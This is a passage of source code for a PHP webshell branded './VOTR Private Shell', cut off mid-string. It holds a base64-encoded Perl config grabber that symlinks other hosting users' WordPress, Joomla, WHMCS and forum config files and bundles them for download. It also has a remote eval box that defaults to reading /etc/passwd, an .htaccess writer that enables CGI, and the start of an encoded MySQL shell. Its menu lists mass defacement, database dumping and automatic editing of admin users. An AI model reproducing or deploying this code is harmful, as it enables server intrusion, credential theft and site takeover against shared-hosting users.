560$configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IiAvPg0KPHRpdGxlPlByaXY4IFNDUjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IHRhaG9tYSwgdmVyZGFuYSwgQXJpYWw7DQogZm9udC1zaXplOiBtZWRpdW07DQogY29sb3I6ICNGRkZGRkY7DQogYmFja2dyb3VuZC1jb2xvcjogIzY2NjY2NjsNCiB0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQogICAgKCR1c2VyKSA9IEBfOw0KJG1zciA9IHF4e3B3ZH07DQoka29sYT0kbXNyLiIvIi4kdXNlcjsNCiRrb2xhPX5zL1xuLy9nOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob21lL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYSAtIGhvbWUudHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcy50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd29yZHByZXNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dlYi93cC1jb25maWcucGhwJywka29sYS4nLXdvcmRwcmVzcyAtIHdlYi50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TU0kucGhwJywka29sYS4nLSBDIE0gRiAudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vU1NJLnBocCcsJGtvbGEuJy0gQyBNIEYgLSBmb3J1bS50eHQnKSA7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJy0gTXlCQi50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nLSBNeUJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nLSBPdGhlci50eHQnKSA7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2xpYi9jb25maWcucGhwJywka29sYS4nLSBCYWxpdGJhbmcudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWNsaWVudHMudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0JykgOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmdzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jcyAtIHdobWNzLnR4dCcpIDsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gd2htIC0gd2htLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLSBWQnVsbGV0aW4gLSBmb3J1bS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vY29uZmlnLnBocCcsJGtvbGEuJwktIFBocEJCIC0gZm9ydW0udHh0JykgOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSB3aG1jIC0gd2htYy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJwktIHdobWNzMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1tYW5nZXdobWNzLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nCS1teXNob3AudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnQudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnRzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1cHBvcnRzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbW1lcmNlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcuaW5jLnBocCcsJGtvbGEuJy1hbWVtYmVyMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd3AudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd3dvcmRwcmVzcyAtIHdwIC0gYmV0YS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmV0YS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBiZXRhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtcHJlc3MudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLXdvcmRwcmVzcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gd29yZHByZXNzLWJldGEudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC1uZXdzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbmV3LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9ncy93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBibG9ncy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSBob21lLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gcHJvdGFsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCRrb2xhLictIHdvcmRwcmVzcyAtIHNpdGUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy0gd29yZHByZXNzIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdGVzdC93cC1jb25maWcucGhwJywka29sYS4nLSB3b3JkcHJlc3MgLSB0ZXN0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhIC0gam9vbWxhIC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBwcm90YWwudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gam9vLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jbXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGNtcy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gc2l0ZS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbWFpbi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy0gam9vbWxhIC0gbmV3cy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLSBqb29tbGEgLSBuZXcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictIGpvb21sYSAtIGhvbWUudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHZiLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy0gdmIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY3BhbmVsLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1wYW5lbC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RpbmcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWhvc3RzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictemVuY2FydC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3plbmNhcnQvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLSB6ZW5jYXJ0IC0gc2hvcC50eHQnKTsgDQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywka29sYS4nLSBzbWYgLSBzbWYudHh0Jyk7IA0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9TZXR0aW5ncy5waHAnLCRrb2xhLictIHNtZiAtIGZvcnVtLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy0gc21mIC0gZm9ydW1zLnR4dCcpOyANCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictIHVwbG9hZCAudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2wvY29uZmlnLnBocCcsJGtvbGEuJy0gbWFsYXkudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy9rb25la3NpLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9zeXN0ZW0vc2lzdGVtLnBocCcsJGtvbGEuJy0gbG9rb21lZGlhLnR4dCcpOyANCiB9DQppZiAoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFtZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPiZuYnNwOzwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9IndpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MDBweCI+PC90ZXh0YXJlYT4NCjxiciAvPjxiciAvPg0KPGlucHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9IndpZHRoOiAyMTJweCIgLz48YnIgLz48YnIgLz4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJIYWphciAuLiEiIHN0eWxlPSJ3aWR0aDogOTlweCIgLz4NCjxiciAvPg0KPC9mb3JtPic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiZsaWwoJDEpOw0KcHJpbnQgTVlGSUxFICQxLiIudHh0ICI7DQpmb3IoJGtkPTE7JGtkPDE4OyRrZCsrKXsNCnByaW50IE1ZRklMRSAkMS4ka2QuIi50eHQgIjsNCn0NCn0NCiB9DQpwcmludCc8Ym9keSBjbGFzcz0ibmV3U3R5bGUxIj4NCjxwPkRvbmUgISE8L3A+DQo8cD4mbmJzcDs8L3A+JzsNCmlmKCRGT1JNe3Rhcn0gbmUgIiIpew0Kb3BlbihJTkZPLCAidGFyLnRtcCIpOw0KQGxpbmVzID08SU5GTz4gOw0KY2xvc2UoSU5GTyk7DQpzeXN0ZW0oQGxpbmVzKTsNCnByaW50JzxwPjxhIGhyZWY9IicuJEZPUk17dGFyfS4nLnRhciI+IGRvd25sb2FkICBmaWxlPC9hPjwvcD4nOw0KfQ0KfQ0KIHByaW50Ig0KPC9ib2R5Pg0KPC9odG1sPiI7';
561?>
562<html>
563<head>
564<title>./VOTR SHELL</title>
565<script type="text/javascript">
566function tukar(lama,baru){
567 document.getElementById(lama).style.display = 'none';
568 document.getElementById(baru).style.display = 'block';
569}
570</script>
571<style type="text/css">
572body{
573 background:#000000;;
574}
575a {
576text-decoration:none;
577}
578a:hover{
579border-bottom:0px solid aqua;
580}
581*{
582 font-size:11px;
583 font-family:Lucida Grande,Lucida Sans Unicode,Lucida Sans;
584 color:#FF1493;
585}
586#menu{
587 background:#000000;
588 margin:8px 2px 4px 2px;
589}
590#menu a{
591 padding:2px 7px;
592 margin:0;
593 background:#BFC7C6;
594 text-decoration:none;
595 letter-spacing:2px;
596 -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
597
598}
599#menu a:hover{
600 background:black;
601 border-bottom:1px solid #FFFF00;
602 border-top:1px solid #FFFF00;
603}
604.tabnet{
605 margin:15px auto 0 auto;
606 border: 1px solid #FFFF00;
607}
608.main {
609 width:100%;
610}
611.gaya {
612 color: white;
613}
614.inputz{
615 background:#111111;
616 border:0;
617 padding:2px;
618 border-bottom:1px solid #222222;
619 border-top:1px solid #222222;
620}
621.inputzbut{
622 background:#111111;
623 color:white;
624 margin:0 4px;
625 border:1px solid #444444;
626
627}
628.inputz:hover
629 border-bottom:1px solid white;
630 border-top:1px solid white;
631
632}
633.inputzbut:hover{
634 border-bottom:1px solid white;
635 border-top:1px solid white;
636}
637.output {
638 margin:auto;
639 border:1px solid aqua;
640 width:100%;
641 height:400px;
642 background:#000000;
643 padding:0 2px;
644}
645.cmdbox{
646 width:100%;
647}
648.head_info{
649 padding: 0 4px;
650}
651.jaya{ font-family: ;}
652
653.kerupuk{
654 font-size:50px;
655 padding:0;
656 color:red;
657}
658.kerupuk_1{
659 text-align:center;
660 margin:0 4px 0 0;
661 padding:0 4px 0 0;
662 border-right:1px solid #333333;
663}
664.phpinfo table{
665 width:100%;
666 padding:0 0 0 0;
667}
668.phpinfo td{
669 background:#111111;
670 color:#cccccc;
671padding:6px 8px;;
672}
673.phpinfo th, th{
674 background:#191919;
675 border-bottom:1px solid #333333;
676font-weight:normal;
677}
678.phpinfo h2, .phpinfo h2 a{
679 text-align:center;
680 font-size:16px;
681 padding:0;
682 margin:30px 0 0 0;
683 background:aqua;
684 padding:4px 0;
685}
686.explore{
687width:100%;
688}
689.explore a {
690text-decoration:none;
691}
692.explore td{
693border-bottom:1px solid #333333;
694padding:0 8px;
695line-height:24px;
696}
697.explore th{
698padding:3px 8px;
699font-weight:normal;
700}
701.explore th:hover , .phpinfo th:hover{
702border-bottom:1px solid aqua;
703}
704.explore tr:hover{
705background:gray;
706}
707.viewfile{
708background:white;
709color:#000000;
710margin:4px 2px;
711padding:8px;
712}
713.sembunyi{
714display:none;
715padding:0;margin:0;
716}
717</style></head>
718<body onLoad="document.getElementById('cmd').focus();">
719<!-- head info start here -->
720<div class="main">
721<center>
722<hr color=black width=100%>
723<img src="http://i65.tinypic.com/2nsm1km.jpg" width="412" height="215"/><a/><br />
724<a href="javascript:void(0)" onclick="location.reload();"><h2><center>./VOTR Private Shell</center></h2></a>
725</center>
726<a href="javascript:void(0)" onclick="location.reload();"><h2><center>THIS IS WEBSHELL :V</center></h2></a>
727<hr color=black width=100%>
728</div>
729<center>
730<td><?php echo $buff; ?></td>
731<hr color=black width=100%>
732
733
734
735<!-- head info end here -->
736<!-- menu start -->
737<div id="menu">
738<a href="?<?php echo "y=".$pwd; ?>">Home</a>
739<a href="?<?php echo "y=".$pwd; ?>&x=shell">Shell</a>
740<a href="?<?php echo "y=".$pwd; ?>&x=php">Eval</a>
741<a href="?<?php echo "y=".$pwd; ?>&x=mysql">Mysql</a>
742<a href="?<?php echo "y=".$pwd; ?>&x=jumping">Jumping</a>
743<a href="?<?php echo "y=".$pwd; ?>&x=grabc">Config Grabber</a>
744<a href="?<?php echo "y=".$pwd; ?>&x=sec">Symlink Server</a>
745<a href="?<?php echo "y=".$pwd; ?>&x=sf">Symlink File</a>
746<a href="?<?php echo "y=".$pwd; ?>&x=dv">/var/named</a>
747<a href="?<?php echo "y=".$pwd; ?>&x=dump">DB Dump</a>
748<br><br>
749<a href="?<?php echo "y=".$pwd; ?>&x=upload">Upload</a>
750<a href="?<?php echo "y=".$pwd; ?>&x=ggwp">Wordpress Auto Edit User</a>
751<a href="?<?php echo "y=".$pwd; ?>&x=joom">Joomla Auto Edit User</a>
752<a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">PhpInfo</a>
753<a href="?<?php echo "y=".$pwd; ?>&x=mass">Mass Deface</a>
754<a href="?<?php echo "y=".$pwd; ?>&x=hash">Hash</a>
755<a href="?<?php echo "y=".$pwd; ?>&x=hashid">Hash ID</a>
756<a href="?<?php echo "y=".$pwd; ?>&x=cpanel">Cpanel Tools</a>
757<a href="?<?php echo "y=".$pwd; ?>&x=netsploit">NetSploit</a>
758<a href="?<?php echo "y=".$pwd; ?>&x=about">About</a>
759<a href="?<?php echo "y=".$pwd; ?>&x=logout">Logout</a>
760
761</div>
762<!-- menu end -->
763
764<?php
765@ini_set('display_errors', 0);
766if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
767<form action="?y=<?php echo $pwd; ?>&x=php" method="post">
768<table class="cmdbox">
769<tr><td>
770<textarea class="output" name="cmd" id="cmd">
771<?php
772if(isset($_POST['submitcmd'])) {
773 echo eval(magicboom($_POST['cmd']));
774}
775else echo "echo file_get_contents('/etc/passwd');";
776?>
777</textarea>
778<tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
779</table>
780</form>
781
782<?php }
783
784elseif(isset($_GET['x']) && ($_GET['x'] == 'sql'))
785 {
786 ?>
787<form action="?y=<?php echo $pwd; ?>&x=sql" method="post">
788<?php
789echo "<center/><br/><b><font color=white>Mysql Interface by S4MP4H</font></b><br><br>";
790 mkdir('mysql', 0755);
791 chdir('mysql');
792 $akses = ".htaccess";
793 $buka_lah = "$akses";
794 $buka = fopen ($buka_lah , 'w') or die ("Error cuyy!");
795 $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
796AddType application/x-httpd-php .cpc
797";
798 fwrite ( $buka , $metin ) ;
799 fclose ($buka);
800$sqlshell = 'PD8NCiRQQVNTV09SRCA9ICJyb290X3hoYWhheCI7DQokVVNFUk5BTUUgPSAieGhhaGF4IjsNCmlmICggZnVuY3Rpb25fZXhpc3RzKCdpbmlfZ2V0JykgKSB7DQoJJG9ub2ZmID0gaW5pX2dldCgncmVnaXN0ZXJfZ2xvYmFscycpOw0KfSBlbHNlIHsNCgkkb25vZmYgPSBnZXRfY2ZnX3ZhcigncmVnaXN0ZXJfZ2xvYmFscycpOw0KfQ0KaWYgKCRvbm9mZiAhPSAxKSB7DQoJQGV4dHJhY3QoJEhUVFBfU0VSVkVSX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfQ09PS0lFX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfUE9TVF9GSUxFUywgRVhUUl9TS0lQKTsNCglAZXh0cmFjdCgkSFRUUF9QT1NUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfR0VUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfRU5WX1ZBUlMsIEVYVFJfU0tJUCk7DQp9DQoNCmZ1bmN0aW9uIGxvZ29uKCkgew0KCWdsb2JhbCAkUEhQX1NFTEY7DQoJc2V0Y29va2llKCAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKTsNCglzZXRjb29raWUoICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICk7DQoJZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgaGVpZ2h0PTEwMCU+PHRyPjx0ZD48Y2VudGVyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9Mj48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjx0YWJsZSBjZWxscGFkZGluZz0yMD48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjxoMT5NeVNRTCBJbnRlcmZhY2UgQnkgUzRNUDRIPC9oMT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rp